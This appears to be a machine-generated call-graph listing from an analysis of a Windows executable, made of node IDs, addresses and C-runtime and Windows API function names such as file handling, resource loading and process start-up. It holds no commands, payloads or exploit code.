98666->98660 98668 633c43 98667->98668 98669 633e11 98667->98669 98670 641207 59 API calls 98668->98670 98673 633c54 98668->98673 98669->98192 98671 633e73 98670->98671 98672 652f70 __cinit 67 API calls 98671->98672 98672->98673 98673->98192 98674->98200 98675->98205 98676->98205 98677->98229 98678->98229 98679->98220 98680->98230 98681->98233 98682->98230 98683->98230 98684 657e83 98685 657e8f __fcloseall 98684->98685 98721 65a038 GetStartupInfoW 98685->98721 98687 657e94 98723 658dac GetProcessHeap 98687->98723 98689 657eec 98690 657ef7 98689->98690 98809 657fd3 58 API calls 3 library calls 98689->98809 98724 659d16 98690->98724 98693 657efd 98694 657f08 __RTC_Initialize 98693->98694 98810 657fd3 58 API calls 3 library calls 98693->98810 98745 65d802 98694->98745 98697 657f17 98698 657f23 GetCommandLineW 98697->98698 98811 657fd3 58 API calls 3 library calls 98697->98811 98764 665153 GetEnvironmentStringsW 98698->98764 98702 657f22 98702->98698 98704 657f3d 98705 657f48 98704->98705 98812 6532e5 58 API calls 3 library calls 98704->98812 98774 664f88 98705->98774 98708 657f4e 98709 657f59 98708->98709 98813 6532e5 58 API calls 3 library calls 98708->98813 98788 65331f 98709->98788 98712 657f61 98713 657f6c __wwincmdln 98712->98713 98814 6532e5 58 API calls 3 library calls 98712->98814 98794 645f8b 98713->98794 98716 657f80 98717 657f8f 98716->98717 98806 653588 98716->98806 98815 653310 58 API calls _doexit 98717->98815 98720 657f94 __fcloseall 98722 65a04e 98721->98722 98722->98687 98723->98689 98816 6533b7 36 API calls 2 library calls 98724->98816 98726 659d1b 98817 659f6c InitializeCriticalSectionAndSpinCount __mtinitlocks 98726->98817 98728 659d20 98729 659d24 98728->98729 98819 659fba TlsAlloc 98728->98819 98818 659d8c 61 API calls 2 library calls 98729->98818 98732 659d29 98732->98693 98733 659d36 98733->98729 98734 659d41 98733->98734 98820 658a05 98734->98820 98737 659d83 98828 659d8c 61 API calls 2 library calls 98737->98828 98740 659d88 98740->98693 98741 659d62 98741->98737 98742 659d68 98741->98742 98827 659c63 58 API calls 4 library calls 98742->98827 98744 659d70 GetCurrentThreadId 98744->98693 98746 65d80e __fcloseall 98745->98746 98747 659e3b __lock 58 API calls 98746->98747 98748 65d815 98747->98748 98749 658a05 __calloc_crt 58 API calls 98748->98749 98751 65d826 98749->98751 98750 65d891 GetStartupInfoW 98758 65d8a6 98750->98758 98761 65d9d5 98750->98761 98751->98750 98752 65d831 __fcloseall @_EH4_CallFilterFunc@8 98751->98752 98752->98697 98753 65da9d 98842 65daad LeaveCriticalSection _doexit 98753->98842 98755 658a05 __calloc_crt 58 API calls 98755->98758 98756 65da22 GetStdHandle 98756->98761 98757 65da35 GetFileType 98757->98761 98758->98755 98759 65d8f4 98758->98759 98758->98761 98760 65d928 GetFileType 98759->98760 98759->98761 98840 65a05b InitializeCriticalSectionAndSpinCount 98759->98840 98760->98759 98761->98753 98761->98756 98761->98757 98841 65a05b InitializeCriticalSectionAndSpinCount 98761->98841 98765 665164 98764->98765 98766 657f33 98764->98766 98843 658a4d 58 API calls 2 library calls 98765->98843 98770 664d4b GetModuleFileNameW 98766->98770 98768 66518a _memmove 98769 6651a0 FreeEnvironmentStringsW 98768->98769 98769->98766 98771 664d7f _wparse_cmdline 98770->98771 98773 664dbf _wparse_cmdline 98771->98773 98844 658a4d 58 API calls 2 library calls 98771->98844 98773->98704 98775 664fa1 __NMSG_WRITE 98774->98775 98779 664f99 98774->98779 98776 658a05 __calloc_crt 58 API calls 98775->98776 98784 664fca __NMSG_WRITE 98776->98784 98777 665021 98778 652f85 _free 58 API calls 98777->98778 98778->98779 98779->98708 98780 658a05 __calloc_crt 58 API calls 98780->98784 98781 665046 98782 652f85 _free 58 API calls 98781->98782 98782->98779 98784->98777 98784->98779 98784->98780 98784->98781 98785 66505d 98784->98785 98845 664837 58 API calls __gmtime64_s 98784->98845 98846 658ff6 IsProcessorFeaturePresent 98785->98846 98787 665069 98787->98708 98789 65332b __IsNonwritableInCurrentImage 98788->98789 98869 65a701 98789->98869 98791 653349 __initterm_e 98792 652f70 __cinit 67 API calls 98791->98792 98793 653368 __cinit __IsNonwritableInCurrentImage 98791->98793 98792->98793 98793->98712 98795 645fa5 98794->98795 98796 646044 98794->98796 98797 645fdf IsThemeActive 98795->98797 98796->98716 98872 65359c 98797->98872 98801 64600b 98884 645f00 SystemParametersInfoW SystemParametersInfoW 98801->98884 98803 646017 98885 645240 98803->98885 98805 64601f SystemParametersInfoW 98805->98796 100042 653459 98806->100042 98808 653597 98808->98717 98809->98690 98810->98694 98811->98702 98815->98720 98816->98726 98817->98728 98818->98732 98819->98733 98823 658a0c 98820->98823 98822 658a47 98822->98737 98826 65a016 TlsSetValue 98822->98826 98823->98822 98825 658a2a 98823->98825 98829 665426 98823->98829 98825->98822 98825->98823 98837 65a362 Sleep 98825->98837 98826->98741 98827->98744 98828->98740 98830 665431 98829->98830 98831 66544c 98829->98831 98830->98831 98832 66543d 98830->98832 98833 66545c RtlAllocateHeap 98831->98833 98835 665442 98831->98835 98839 6535d1 DecodePointer 98831->98839 98838 658d58 58 API calls __getptd_noexit 98832->98838 98833->98831 98833->98835 98835->98823 98837->98825 98838->98835 98839->98831 98840->98759 98841->98761 98842->98752 98843->98768 98844->98773 98845->98784 98847 659001 98846->98847 98852 658e89 98847->98852 98851 65901c 98851->98787 98853 658ea3 _memset __call_reportfault 98852->98853 98854 658ec3 IsDebuggerPresent 98853->98854 98860 65a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 98854->98860 98857 658faa 98859 65a370 GetCurrentProcess TerminateProcess 98857->98859 98858 658f87 __call_reportfault 98861 65c826 98858->98861 98859->98851 98860->98858 98862 65c830 IsProcessorFeaturePresent 98861->98862 98863 65c82e 98861->98863 98865 665b3a 98862->98865 98863->98857 98868 665ae9 5 API calls 2 library calls 98865->98868 98867 665c1d 98867->98857 98868->98867 98870 65a704 EncodePointer 98869->98870 98870->98870 98871 65a71e 98870->98871 98871->98791 98873 659e3b __lock 58 API calls 98872->98873 98874 6535a7 DecodePointer EncodePointer 98873->98874 98937 659fa5 LeaveCriticalSection 98874->98937 98876 646004 98877 653604 98876->98877 98878 65360e 98877->98878 98879 653628 98877->98879 98878->98879 98938 658d58 58 API calls __getptd_noexit 98878->98938 98879->98801 98881 653618 98939 658fe6 9 API calls __gmtime64_s 98881->98939 98883 653623 98883->98801 98884->98803 98886 64524d __write_nolock 98885->98886 98887 641207 59 API calls 98886->98887 98888 645258 GetCurrentDirectoryW 98887->98888 98940 644ec8 98888->98940 98890 64527e IsDebuggerPresent 98891 64528c 98890->98891 98892 680b21 MessageBoxA 98890->98892 98893 680b39 98891->98893 98894 6452a0 98891->98894 98892->98893 99063 64314d 59 API calls Mailbox 98893->99063 99008 6431bf 98894->99008 98897 680b49 98905 680b5f SetCurrentDirectoryW 98897->98905 98899 645358 98901 64535f SetCurrentDirectoryW 98899->98901 98900 6452be GetFullPathNameW 98902 641821 59 API calls 98900->98902 98904 64536c Mailbox 98901->98904 98903 6452f9 98902->98903 99024 63bbc6 98903->99024 98904->98805 98905->98904 98908 645314 98909 64531e 98908->98909 99064 694f1c AllocateAndInitializeSid CheckTokenMembership FreeSid 98908->99064 99040 64514c GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98909->99040 98912 680b7c 98912->98909 98916 680b8d 98912->98916 99065 6500cf 98916->99065 98937->98876 98938->98881 98939->98883 98941 641207 59 API calls 98940->98941 98942 644ede 98941->98942 99080 645420 98942->99080 98944 644efc 99094 6419e1 98944->99094 98946 644f10 98947 641c9c 59 API calls 98946->98947 98948 644f1b 98947->98948 99098 63477a 98948->99098 98951 641a36 59 API calls 98952 644f34 98951->98952 98953 6339be 68 API calls 98952->98953 98954 644f44 Mailbox 98953->98954 98955 641a36 59 API calls 98954->98955 98956 644f68 98955->98956 98957 6339be 68 API calls 98956->98957 98958 644f77 Mailbox 98957->98958 98959 641207 59 API calls 98958->98959 98960 644f94 98959->98960 99101 6455bc 98960->99101 98964 644fae 98965 680a54 98964->98965 98966 644fb8 98964->98966 98967 6455bc 59 API calls 98965->98967 98968 65312d _W_store_winword 60 API calls 98966->98968 98969 680a68 98967->98969 98970 644fc3 98968->98970 98972 6455bc 59 API calls 98969->98972 98970->98969 98971 644fcd 98970->98971 98973 65312d _W_store_winword 60 API calls 98971->98973 98974 680a84 98972->98974 98975 644fd8 98973->98975 98978 6500cf 61 API calls 98974->98978 98975->98974 98976 644fe2 98975->98976 98977 65312d _W_store_winword 60 API calls 98976->98977 98980 644fed 98977->98980 98979 680aa7 98978->98979 98981 6455bc 59 API calls 98979->98981 98982 644ff7 98980->98982 98997 680ad0 98980->98997 98983 680ab3 98981->98983 98984 64501b 98982->98984 98987 641c9c 59 API calls 98982->98987 98986 641c9c 59 API calls 98983->98986 98991 6347be 59 API calls 98984->98991 98985 6455bc 59 API calls 98988 680aee 98985->98988 98989 680ac1 98986->98989 98990 64500e 98987->98990 98992 641c9c 59 API calls 98988->98992 98993 6455bc 59 API calls 98989->98993 98994 6455bc 59 API calls 98990->98994 98995 64502a 98991->98995 98996 680afc 98992->98996 98993->98997 98994->98984 98998 634540 59 API calls 98995->98998 98999 6455bc 59 API calls 98996->98999 98997->98985 99000 645038 98998->99000 99001 680b0b 98999->99001 99117 6343d0 99000->99117 99001->99001 99003 63477a 59 API calls 99005 645055 99003->99005 99004 6343d0 59 API calls 99004->99005 99005->99003 99005->99004 99006 6455bc 59 API calls 99005->99006 99007 64509b Mailbox 99005->99007 99006->99005 99007->98890 99009 6431cc __write_nolock 99008->99009 99010 6431e5 99009->99010 99011 680314 _memset 99009->99011 99140 650284 99010->99140 99013 680330 GetOpenFileNameW 99011->99013 99015 68037f 99013->99015 99018 641821 59 API calls 99015->99018 99020 680394 99018->99020 99020->99020 99021 643203 99168 64278a 99021->99168 99025 63bbd3 __write_nolock 99024->99025 99979 642cb2 99025->99979 99027 63bbd8 99039 63bc52 99027->99039 99990 63c770 89 API calls 99027->99990 99029 63bbe5 99029->99039 99991 63f5a7 91 API calls Mailbox 99029->99991 99031 63bbee 99032 63bbf2 GetFullPathNameW 99031->99032 99031->99039 99033 641821 59 API calls 99032->99033 99039->98897 99039->98908 99041 6451b6 LoadImageW RegisterClassExW 99040->99041 99042 680b10 99040->99042 99994 633411 7 API calls 99041->99994 99995 645f5b LoadImageW EnumResourceNamesW 99042->99995 99063->98897 99064->98912 99081 64542d __write_nolock 99080->99081 99082 641821 59 API calls 99081->99082 99087 645590 Mailbox 99081->99087 99083 64545f 99082->99083 99093 645495 Mailbox 99083->99093 99126 641609 99083->99126 99085 645563 99086 641a36 59 API calls 99085->99086 99085->99087 99088 645584 99086->99088 99087->98944 99090 644c94 59 API calls 99088->99090 99089 641a36 59 API calls 99089->99093 99090->99087 99091 641609 59 API calls 99091->99093 99093->99085 99093->99087 99093->99089 99093->99091 99129 644c94 99093->99129 99095 6419fb 99094->99095 99097 6419ee 99094->99097 99096 650fe6 Mailbox 59 API calls 99095->99096 99096->99097 99097->98946 99099 650fe6 Mailbox 59 API calls 99098->99099 99100 634787 99099->99100 99100->98951 99102 6455c6 99101->99102 99103 6455df 99101->99103 99104 641c9c 59 API calls 99102->99104 99105 641821 59 API calls 99103->99105 99106 644fa0 99104->99106 99105->99106 99107 65312d 99106->99107 99108 6531ae 99107->99108 99109 653139 99107->99109 99137 6531c0 60 API calls 3 library calls 99108->99137 99116 65315e 99109->99116 99135 658d58 58 API calls __getptd_noexit 99109->99135 99112 6531bb 99112->98964 99113 653145 99136 658fe6 9 API calls __gmtime64_s 99113->99136 99115 653150 99115->98964 99116->98964 99118 66d6c9 99117->99118 99120 6343e7 99117->99120 99118->99120 99139 6340cb 59 API calls Mailbox 99118->99139 99121 634530 99120->99121 99122 6344e8 99120->99122 99125 6344ef 99120->99125 99138 63523c 59 API calls 99121->99138 99124 650fe6 Mailbox 59 API calls 99122->99124 99124->99125 99125->99005 99127 641aa4 59 API calls 99126->99127 99128 641614 99127->99128 99128->99083 99130 644ca2 99129->99130 99134 644cc4 _memmove 99129->99134 99132 650fe6 Mailbox 59 API calls 99130->99132 99131 650fe6 Mailbox 59 API calls 99133 644cd8 99131->99133 99132->99134 99133->99093 99134->99131 99135->99113 99136->99115 99137->99112 99138->99125 99139->99120 99202 661b70 99140->99202 99143 6502b0 99145 641821 59 API calls 99143->99145 99144 6502cd 99146 6419e1 59 API calls 99144->99146 99147 6502bc 99145->99147 99146->99147 99204 64133d 99147->99204 99150 6509c5 99151 661b70 __write_nolock 99150->99151 99152 6509d2 GetLongPathNameW 99151->99152 99153 641821 59 API calls 99152->99153 99154 6431f7 99153->99154 99155 642f3d 99154->99155 99156 641207 59 API calls 99155->99156 99157 642f4f 99156->99157 99158 650284 60 API calls 99157->99158 99159 642f5a 99158->99159 99160 642f65 99159->99160 99163 680177 99159->99163 99162 644c94 59 API calls 99160->99162 99164 642f71 99162->99164 99166 680191 99163->99166 99214 64151f 61 API calls 99163->99214 99208 631307 99164->99208 99167 642f84 Mailbox 99167->99021 99215 6449c2 99168->99215 99171 67f8d6 99332 699b16 99171->99332 99172 6449c2 136 API calls 99174 6427c3 99172->99174 99174->99171 99176 6427cb 99174->99176 99180 6427d7 99176->99180 99181 67f8f3 99176->99181 99177 67f8eb 99390 644a2f 99177->99390 99178 67f908 99179 650fe6 Mailbox 59 API calls 99178->99179 99198 67f94d Mailbox 99179->99198 99239 6429be 99180->99239 99396 6947e8 90 API calls _wprintf 99181->99396 99185 67f901 99185->99178 99187 67fb01 99188 652f85 _free 58 API calls 99187->99188 99189 67fb09 99188->99189 99190 644a2f 84 API calls 99189->99190 99195 67fb12 99190->99195 99194 652f85 _free 58 API calls 99194->99195 99195->99194 99197 644a2f 84 API calls 99195->99197 99398 68ff5c 89 API calls 4 library calls 99195->99398 99197->99195 99198->99187 99198->99195 99199 641a36 59 API calls 99198->99199 99367 68fef8 99198->99367 99370 69793a 99198->99370 99376 64343f 99198->99376 99384 643297 99198->99384 99397 68fe19 61 API calls 2 library calls 99198->99397 99199->99198 99203 650291 GetFullPathNameW 99202->99203 99203->99143 99203->99144 99205 64134b 99204->99205 99206 641981 59 API calls 99205->99206 99207 64135b 99206->99207 99207->99150 99209 631319 99208->99209 99213 631338 _memmove 99208->99213 99211 650fe6 Mailbox 59 API calls 99209->99211 99210 650fe6 Mailbox 59 API calls 99212 63134f 99210->99212 99211->99213 99212->99167 99213->99210 99214->99163 99399 644b29 99215->99399 99220 6808bb 99222 644a2f 84 API calls 99220->99222 99221 6449ed LoadLibraryExW 99409 644ade 99221->99409 99224 6808c2 99222->99224 99226 644ade 3 API calls 99224->99226 99228 6808ca 99226->99228 99435 644ab2 99228->99435 99229 644a14 99229->99228 99230 644a20 99229->99230 99231 644a2f 84 API calls 99230->99231 99233 6427af 99231->99233 99233->99171 99233->99172 99236 6808f1 99443 644a6e 99236->99443 99238 6808fe 99240 67fd14 99239->99240 99241 6429e7 99239->99241 99818 68ff5c 89 API calls 4 library calls 99240->99818 99800 643df7 60 API calls Mailbox 99241->99800 99244 67fd27 99819 68ff5c 89 API calls 4 library calls 99244->99819 99245 642a09 99801 643e47 67 API calls 99245->99801 99247 642a1e 99247->99244 99248 642a26 99247->99248 99250 641207 59 API calls 99248->99250 99252 642a32 99250->99252 99251 67fd43 99254 642a93 99251->99254 99802 650b8b 60 API calls __write_nolock 99252->99802 99256 67fd56 99254->99256 99257 642aa1 99254->99257 99255 642a3e 99259 641207 59 API calls 99255->99259 99260 6442cf CloseHandle 99256->99260 99258 641207 59 API calls 99257->99258 99261 642aaa 99258->99261 99262 642a4a 99259->99262 99263 67fd62 99260->99263 99264 641207 59 API calls 99261->99264 99265 650284 60 API calls 99262->99265 99266 6449c2 136 API calls 99263->99266 99268 642ab3 99264->99268 99269 642a58 99265->99269 99267 67fd7e 99266->99267 99270 67fda3 99267->99270 99273 699b16 122 API calls 99267->99273 99805 650119 59 API calls Mailbox 99268->99805 99803 643ea1 ReadFile SetFilePointerEx 99269->99803 99820 68ff5c 89 API calls 4 library calls 99270->99820 99277 67fd96 99273->99277 99274 642aca 99806 6417e0 59 API calls Mailbox 99274->99806 99276 642a84 99804 64410a SetFilePointerEx SetFilePointerEx 99276->99804 99281 67fdbf 99277->99281 99282 67fd9e 99277->99282 99279 67fdba 99310 642c3e Mailbox 99279->99310 99285 644a2f 84 API calls 99281->99285 99284 644a2f 84 API calls 99282->99284 99283 642adb SetCurrentDirectoryW 99288 642aee Mailbox 99283->99288 99284->99270 99286 67fdc4 99285->99286 99287 650fe6 Mailbox 59 API calls 99286->99287 99293 67fdf8 99287->99293 99290 650fe6 Mailbox 59 API calls 99288->99290 99292 642b01 99290->99292 99291 6427ef 99291->98899 99291->98900 99294 64433f 59 API calls 99292->99294 99295 64343f 59 API calls 99293->99295 99321 642b0c Mailbox __NMSG_WRITE 99294->99321 99329 67fe41 Mailbox 99295->99329 99296 642c19 99814 6442cf 99296->99814 99298 680032 99302 69789a 59 API calls 99298->99302 99300 642c25 SetCurrentDirectoryW 99300->99310 99303 680054 99302->99303 99823 69fc0d 59 API calls 2 library calls 99303->99823 99306 680061 99308 652f85 _free 58 API calls 99306->99308 99307 6800cb 99826 68ff5c 89 API calls 4 library calls 99307->99826 99308->99310 99795 643e25 99310->99795 99312 6800e4 99312->99296 99313 64343f 59 API calls 99313->99329 99314 6800c3 99825 68fdb2 59 API calls 4 library calls 99314->99825 99316 641a36 59 API calls 99316->99321 99320 68fef8 59 API calls 99320->99329 99321->99296 99321->99307 99321->99314 99321->99316 99807 643ebe 67 API calls _wcscpy 99321->99807 99808 642e8f GetStringTypeW 99321->99808 99809 642dfe 60 API calls __wcsnicmp 99321->99809 99810 642edc GetStringTypeW __NMSG_WRITE 99321->99810 99811 65386d GetStringTypeW _iswctype 99321->99811 99812 6427fc 165 API calls 3 library calls 99321->99812 99813 64314d 59 API calls Mailbox 99321->99813 99322 641a36 59 API calls 99322->99329 99323 69793a 59 API calls 99323->99329 99325 680084 99824 68ff5c 89 API calls 4 library calls 99325->99824 99328 68009d 99330 652f85 _free 58 API calls 99328->99330 99329->99298 99329->99313 99329->99320 99329->99322 99329->99323 99329->99325 99821 68fe19 61 API calls 2 library calls 99329->99821 99822 64314d 59 API calls Mailbox 99329->99822 99331 6800b0 99330->99331 99331->99310 99333 644a8c 85 API calls 99332->99333 99334 699b85 99333->99334 99827 699cf1 99334->99827 99337 644ab2 74 API calls 99338 699bb4 99337->99338 99339 644ab2 74 API calls 99338->99339 99340 699bc4 99339->99340 99341 644ab2 74 API calls 99340->99341 99342 699bdf 99341->99342 99343 644ab2 74 API calls 99342->99343 99344 699bfa 99343->99344 99345 644a8c 85 API calls 99344->99345 99346 699c11 99345->99346 99347 65593c __crtGetStringTypeA_stat 58 API calls 99346->99347 99348 699c18 99347->99348 99349 65593c __crtGetStringTypeA_stat 58 API calls 99348->99349 99350 699c22 99349->99350 99351 644ab2 74 API calls 99350->99351 99352 699c36 99351->99352 99353 6996c4 GetSystemTimeAsFileTime 99352->99353 99354 699c49 99353->99354 99355 699c5e 99354->99355 99356 699c73 99354->99356 99357 652f85 _free 58 API calls 99355->99357 99358 699c79 99356->99358 99359 699cd8 99356->99359 99360 699c64 99357->99360 99833 6990c1 99358->99833 99362 652f85 _free 58 API calls 99359->99362 99363 652f85 _free 58 API calls 99360->99363 99365 67f8e7 99362->99365 99363->99365 99365->99177 99365->99178 99366 652f85 _free 58 API calls 99366->99365 99368 650fe6 Mailbox 59 API calls 99367->99368 99369 68ff28 _memmove 99368->99369 99369->99198 99371 697945 99370->99371 99372 650fe6 Mailbox 59 API calls 99371->99372 99373 69795c 99372->99373 99374 641a36 59 API calls 99373->99374 99375 69796b 99373->99375 99374->99375 99375->99198 99377 6434df 99376->99377 99381 643452 _memmove 99376->99381 99379 650fe6 Mailbox 59 API calls 99377->99379 99378 650fe6 Mailbox 59 API calls 99380 643459 99378->99380 99379->99381 99382 650fe6 Mailbox 59 API calls 99380->99382 99383 643482 99380->99383 99381->99378 99382->99383 99383->99198 99385 6432aa 99384->99385 99388 643358 99384->99388 99386 650fe6 Mailbox 59 API calls 99385->99386 99387 6432dc 99385->99387 99386->99387 99387->99388 99389 650fe6 59 API calls Mailbox 99387->99389 99388->99198 99389->99387 99391 644a39 99390->99391 99393 644a40 99390->99393 99392 6555c6 __fcloseall 83 API calls 99391->99392 99392->99393 99394 644a60 FreeLibrary 99393->99394 99395 644a4f 99393->99395 99394->99395 99395->99181 99396->99185 99397->99198 99398->99195 99448 644b77 99399->99448 99402 644b50 99404 644b60 FreeLibrary 99402->99404 99405 6449d4 99402->99405 99403 644b77 2 API calls 99403->99402 99404->99405 99406 65547b 99405->99406 99452 655490 99406->99452 99408 6449e1 99408->99220 99408->99221 99533 644baa 99409->99533 99412 644b15 FreeLibrary 99413 644a05 99412->99413 99416 6448b0 99413->99416 99414 644baa 2 API calls 99415 644b03 99414->99415 99415->99412 99415->99413 99417 650fe6 Mailbox 59 API calls 99416->99417 99418 6448c5 99417->99418 99419 64433f 59 API calls 99418->99419 99420 6448d1 _memmove 99419->99420 99421 68080a 99420->99421 99422 64490c 99420->99422 99426 680817 99421->99426 99542 699ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99421->99542 99423 644a6e 69 API calls 99422->99423 99434 644915 99423->99434 99543 699f5e 95 API calls 99426->99543 99427 644ab2 74 API calls 99427->99434 99429 680859 99537 644a8c 99429->99537 99431 644a8c 85 API calls 99431->99434 99432 644ab2 74 API calls 99433 6449a0 99432->99433 99433->99229 99434->99427 99434->99429 99434->99431 99434->99433 99436 644ac4 99435->99436 99439 680945 99435->99439 99649 655802 99436->99649 99440 6996c4 99774 69951a 99440->99774 99442 6996da 99442->99236 99444 680908 99443->99444 99445 644a7d 99443->99445 99779 655e80 99445->99779 99447 644a85 99447->99238 99449 644b44 99448->99449 99450 644b80 LoadLibraryA 99448->99450 99449->99402 99449->99403 99450->99449 99451 644b91 GetProcAddress 99450->99451 99451->99449 99454 65549c __fcloseall 99452->99454 99453 6554af 99501 658d58 58 API calls __getptd_noexit 99453->99501 99454->99453 99456 6554e0 99454->99456 99471 660718 99456->99471 99457 6554b4 99502 658fe6 9 API calls __gmtime64_s 99457->99502 99460 6554e5 99461 6554ee 99460->99461 99462 6554fb 99460->99462 99503 658d58 58 API calls __getptd_noexit 99461->99503 99464 655525 99462->99464 99465 655505 99462->99465 99486 660837 99464->99486 99504 658d58 58 API calls __getptd_noexit 99465->99504 99470 6554bf __fcloseall @_EH4_CallFilterFunc@8 99470->99408 99472 660724 __fcloseall 99471->99472 99473 659e3b __lock 58 API calls 99472->99473 99484 660732 99473->99484 99474 6607a6 99506 66082e 99474->99506 99475 6607ad 99511 658a4d 58 API calls 2 library calls 99475->99511 99478 660823 __fcloseall 99478->99460 99479 6607b4 99479->99474 99512 65a05b InitializeCriticalSectionAndSpinCount 99479->99512 99481 659ec3 __mtinitlocknum 58 API calls 99481->99484 99483 6607da EnterCriticalSection 99483->99474 99484->99474 99484->99475 99484->99481 99509 656e7d 59 API calls __lock 99484->99509 99510 656ee7 LeaveCriticalSection LeaveCriticalSection _doexit 99484->99510 99494 660857 __wopenfile 99486->99494 99487 660871 99517 658d58 58 API calls __getptd_noexit 99487->99517 99489 660876 99518 658fe6 9 API calls __gmtime64_s 99489->99518 99491 655530 99505 655552 LeaveCriticalSection LeaveCriticalSection _fseek 99491->99505 99492 660a8f 99514 6687d1 99492->99514 99494->99487 99500 660a2c 99494->99500 99519 6539fb 60 API calls 2 library calls 99494->99519 99496 660a25 99496->99500 99520 6539fb 60 API calls 2 library calls 99496->99520 99498 660a44 99498->99500 99521 6539fb 60 API calls 2 library calls 99498->99521 99500->99487 99500->99492 99501->99457 99502->99470 99503->99470 99504->99470 99505->99470 99513 659fa5 LeaveCriticalSection 99506->99513 99508 660835 99508->99478 99509->99484 99510->99484 99511->99479 99512->99483 99513->99508 99522 667fb5 99514->99522 99516 6687ea 99516->99491 99517->99489 99518->99491 99519->99496 99520->99498 99521->99500 99523 667fc1 __fcloseall 99522->99523 99524 667fd7 99523->99524 99527 66800d 99523->99527 99525 658d58 __gmtime64_s 58 API calls 99524->99525 99526 667fdc 99525->99526 99528 658fe6 __gmtime64_s 9 API calls 99526->99528 99529 66807e __wsopen_nolock 109 API calls 99527->99529 99532 667fe6 __fcloseall 99528->99532 99530 668029 99529->99530 99531 668052 __wsopen_helper LeaveCriticalSection 99530->99531 99531->99532 99532->99516 99534 644af7 99533->99534 99535 644bb3 LoadLibraryA 99533->99535 99534->99414 99534->99415 99535->99534 99536 644bc4 GetProcAddress 99535->99536 99536->99534 99538 644a9b 99537->99538 99541 680923 99537->99541 99544 655a6d 99538->99544 99540 644aa9 99540->99432 99542->99426 99543->99434 99545 655a79 __fcloseall 99544->99545 99546 655a8b 99545->99546 99548 655ab1 99545->99548 99575 658d58 58 API calls __getptd_noexit 99546->99575 99557 656e3e 99548->99557 99549 655a90 99576 658fe6 9 API calls __gmtime64_s 99549->99576 99556 655a9b __fcloseall 99556->99540 99558 656e70 EnterCriticalSection 99557->99558 99559 656e4e 99557->99559 99561 655ab7 99558->99561 99559->99558 99560 656e56 99559->99560 99562 659e3b __lock 58 API calls 99560->99562 99563 6559de 99561->99563 99562->99561 99564 6559fc 99563->99564 99565 6559ec 99563->99565 99566 655a12 99564->99566 99578 655af0 99564->99578 99648 658d58 58 API calls __getptd_noexit 99565->99648 99607 654c5d 99566->99607 99572 655a53 99620 66185f 99572->99620 99574 6559f1 99577 655ae8 LeaveCriticalSection LeaveCriticalSection _fseek 99574->99577 99575->99549 99576->99556 99577->99556 99579 655afd __write_nolock 99578->99579 99580 655b15 99579->99580 99581 655b2d 99579->99581 99583 658d58 __gmtime64_s 58 API calls 99580->99583 99582 654906 __output_l 58 API calls 99581->99582 99584 655b35 99582->99584 99585 655b1a 99583->99585 99587 66185f __write 64 API calls 99584->99587 99586 658fe6 __gmtime64_s 9 API calls 99585->99586 99605 655b25 99586->99605 99588 655b51 99587->99588 99591 655bd4 99588->99591 99592 655d41 99588->99592 99588->99605 99589 65c826 __woutput_l 6 API calls 99590 655e7c 99589->99590 99590->99566 99594 655bfa 99591->99594 99598 655cfd 99591->99598 99593 655d4a 99592->99593 99592->99598 99595 658d58 __gmtime64_s 58 API calls 99593->99595 99596 6619f5 __lseeki64 62 API calls 99594->99596 99594->99605 99595->99605 99597 655c33 99596->99597 99600 655c5f ReadFile 99597->99600 99597->99605 99599 66185f __write 64 API calls 99598->99599 99598->99605 99601 655dae 99599->99601 99602 655c84 99600->99602 99600->99605 99604 66185f __write 64 API calls 99601->99604 99601->99605 99603 66185f __write 64 API calls 99602->99603 99606 655c97 99603->99606 99604->99605 99605->99589 99606->99605 99608 654c70 99607->99608 99612 654c94 99607->99612 99609 654906 __output_l 58 API calls 99608->99609 99608->99612 99610 654c8d 99609->99610 99611 65dab6 __write 78 API calls 99610->99611 99611->99612 99613 654906 99612->99613 99614 654925 99613->99614 99615 654910 99613->99615 99614->99572 99616 658d58 __gmtime64_s 58 API calls 99615->99616 99617 654915 99616->99617 99618 658fe6 __gmtime64_s 9 API calls 99617->99618 99619 654920 99618->99619 99619->99572 99621 66186b __fcloseall 99620->99621 99622 66188f 99621->99622 99623 661878 99621->99623 99625 66192e 99622->99625 99627 6618a3 99622->99627 99624 658d24 __close 58 API calls 99623->99624 99626 66187d 99624->99626 99628 658d24 __close 58 API calls 99625->99628 99629 658d58 __gmtime64_s 58 API calls 99626->99629 99630 6618c1 99627->99630 99631 6618cb 99627->99631 99632 6618c6 99628->99632 99640 661884 __fcloseall 99629->99640 99633 658d24 __close 58 API calls 99630->99633 99634 65d436 ___lock_fhandle 59 API calls 99631->99634 99636 658d58 __gmtime64_s 58 API calls 99632->99636 99633->99632 99635 6618d1 99634->99635 99637 6618f7 99635->99637 99638 6618e4 99635->99638 99639 66193a 99636->99639 99641 658d58 __gmtime64_s 58 API calls 99637->99641 99642 66194e __lseek_nolock 62 API calls 99638->99642 99643 658fe6 __gmtime64_s 9 API calls 99639->99643 99640->99574 99645 6618fc 99641->99645 99644 6618f0 99642->99644 99643->99640 99647 661926 __write LeaveCriticalSection 99644->99647 99646 658d24 __close 58 API calls 99645->99646 99646->99644 99647->99640 99648->99574 99652 65581d 99649->99652 99651 644ad5 99651->99440 99653 655829 __fcloseall 99652->99653 99654 65586c 99653->99654 99655 65583f _memset 99653->99655 99656 655864 __fcloseall 99653->99656 99657 656e3e __lock_file 59 API calls 99654->99657 99679 658d58 58 API calls __getptd_noexit 99655->99679 99656->99651 99658 655872 99657->99658 99665 65563d 99658->99665 99661 655859 99680 658fe6 9 API calls __gmtime64_s 99661->99680 99666 655658 _memset 99665->99666 99672 655673 99665->99672 99667 655663 99666->99667 99666->99672 99676 6556b3 99666->99676 99770 658d58 58 API calls __getptd_noexit 99667->99770 99669 655668 99771 658fe6 9 API calls __gmtime64_s 99669->99771 99681 6558a6 LeaveCriticalSection LeaveCriticalSection _fseek 99672->99681 99673 6557c4 _memset 99773 658d58 58 API calls __getptd_noexit 99673->99773 99674 654906 __output_l 58 API calls 99674->99676 99676->99672 99676->99673 99676->99674 99682 66108b 99676->99682 99750 660dd7 99676->99750 99772 660ef8 58 API calls 3 library calls 99676->99772 99679->99661 99680->99656 99681->99656 99683 6610c3 99682->99683 99684 6610ac 99682->99684 99686 6617fb 99683->99686 99691 6610fd 99683->99691 99685 658d24 __close 58 API calls 99684->99685 99688 6610b1 99685->99688 99687 658d24 __close 58 API calls 99686->99687 99689 661800 99687->99689 99690 658d58 __gmtime64_s 58 API calls 99688->99690 99693 658d58 